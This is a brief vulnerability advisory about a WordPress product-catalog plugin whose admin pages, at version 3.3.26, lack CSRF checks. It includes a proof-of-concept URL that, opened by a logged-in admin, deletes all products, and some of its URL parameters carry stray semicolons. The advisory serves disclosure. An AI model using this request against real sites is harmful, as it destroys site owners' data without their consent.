Description The plugin does not have CSRF checks in some of its admin pages, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks, such as delete all products
Make a logged in admin open the URL below https://example.com/wp-admin/edit.php?post_type=al_product&page;=system.php&delete;_all_products&delete;_all_products_confirm=1
CPE | Name | Operator | Version |
---|---|---|---|
eq | 3.3.26 |